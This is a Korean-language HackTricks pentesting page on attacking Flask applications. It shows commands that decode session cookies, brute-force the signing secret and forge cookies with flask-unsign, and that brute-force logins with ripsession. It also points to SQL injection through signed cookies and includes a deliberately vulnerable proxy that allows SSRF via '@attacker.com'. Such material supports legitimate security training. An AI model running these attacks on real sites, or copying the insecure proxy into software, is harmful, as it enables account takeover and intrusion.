htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 히어로까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!
Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축하고 자동화하세요.
오늘 바로 액세스하세요:
아마도 CTF를 진행 중이라면 Flask 애플리케이션은 SSTI과 관렸이 있을 것입니다.
쿠키
기본 쿠키 세션 이름은 **session**입니다.
디코더
온라인 Flask 쿠키 디코더: https://www.kirsle.net/wizards/flask-session.cgi
수동
쿠키의 첫 번째 부분을 첫 번째 점까지 가져와서 Base64로 디코딩하세요.
echo "ImhlbGxvIg" | base64 -d
쿠키는 비밀번호를 사용하여 서명됩니다
Flask-Unsign
Flask 애플리케이션의 세션 쿠키를 추측하여 비밀 키를 맞추어 가져오고 해독하고 브루트 포스 및 작성하는 명령 줄 도구.
pip3 install flask-unsign
쿠키 디코딩
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
무차별 대입
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
서명
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
레거시(이전 버전) 사용하여 서명하기
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
RIPsession
플라스크-unsign으로 제작된 쿠키를 사용하여 웹사이트를 브루트 포스하는 명령줄 도구입니다.
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
SQLi in Flask session cookie with SQLmap
이 예제는 알려진 시크릿을 사용하여 Flask에 대한 sqlmap 페이로드를 자동으로 서명하는 데 sqlmap eval 옵션을 사용합니다.
Flask Proxy to SSRF
이 설명서에서 Flask가 "@" 문자로 시작하는 요청을 허용하는 방법에 대해 설명되어 있습니다.
GET @/ HTTP/1.1
Host: target.com
Connection: close
다음 시나리오에서:
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com/'
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
"@attacker.com"과 같은 것을 소개할 수 있도록 허용하여 SSRF를 유발할 수 있습니다.
Trickest을 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축 및 자동화하세요.
오늘 액세스하세요:
htARTE (HackTricks AWS Red Team Expert)로부터 제로에서 영웅까지 AWS 해킹 배우기
HackTricks를 지원하는 다른 방법:
HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.
